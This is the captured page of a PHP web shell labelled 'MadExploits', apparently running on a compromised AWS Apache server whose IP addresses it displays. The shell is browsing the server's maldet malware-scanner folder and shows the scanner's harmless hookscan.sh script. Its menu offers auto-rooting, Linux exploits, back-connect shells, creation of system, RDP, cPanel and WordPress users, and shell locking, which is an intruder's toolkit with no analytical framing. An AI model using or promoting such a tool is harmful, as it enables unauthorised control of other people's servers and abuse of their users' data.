Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.148.248.235
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
local /
maldetect.bk837687 /
[ HOME SHELL ]
Name
Size
Permission
Action
clean
[ DIR ]
drwxr-xr-x
cron
[ DIR ]
drwxr-xr-x
internals
[ DIR ]
drwxr-xr-x
logs
[ DIR ]
drwxr-xr-x
pub
[ DIR ]
drwxr-xr-x
quarantine
[ DIR ]
drwxr-x---
service
[ DIR ]
drwxr-xr-x
sess
[ DIR ]
drwxr-x---
sigs
[ DIR ]
drwxr-xr-x
sigs.old
[ DIR ]
drwxr-xr-x
tmp
[ DIR ]
drwxr-xr-x
CHANGELOG
47.91
KB
-rw-r--r--
COPYING.GPL
17.67
KB
-rw-r--r--
README
23.87
KB
-rw-r--r--
VERSION
6
B
-rw-r--r--
VERSION.hash
64
B
-rw-r--r--
conf.maldet
15.16
KB
-rw-r--r--
conf.maldet.cron
155
B
-rw-r--r--
event_log
61.42
KB
-rw-r--r--
hookscan.sh
702
B
-rwxr-xr-x
ignore_file_ext
0
B
-rw-r--r--
ignore_inotify
201
B
-rw-r--r--
ignore_paths
44
B
-rw-r--r--
ignore_sigs
0
B
-rw-r--r--
maldet
7.47
KB
-rwxr-xr-x
maldet.1.gz
3.94
KB
-rw-r--r--
modsec.sh
702
B
-rwxr-xr-x
monitor_paths
0
B
-rw-r--r--
uninstall.sh
1.54
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : hookscan.sh
#!/usr/bin/env bash file="$1" inspath='/usr/local/maldetect' intcnf="$inspath/internals/internals.conf" if [ -f "$intcnf" ]; then source $intcnf fi ## these values can be overridden in conf.maldet.hookscan quarantine_hits=1 quarantine_clean=0 scan_tmpdir_paths='' hscan=1 isclamd=`pidof clamd 2> /dev/null` if [ "$isclamd" ] && [ -f "$clamdscan" ]; then clamd_scan=1 else clamd_scan=0 fi hookcnf="$inspath/conf.maldet.hookscan" if [ -f "$hookcnf" ]; then source $hookcnf fi cd /tmp ; $inspath/maldet --hook-scan --config-option quarantine_hits=$quarantine_hits,quarantine_clean=$quarantine_clean,tmpdir=/var/tmp,scan_tmpdir_paths=$scan_tmpdir_paths,scan_clamscan=$clamd_scan -a "$file"
Close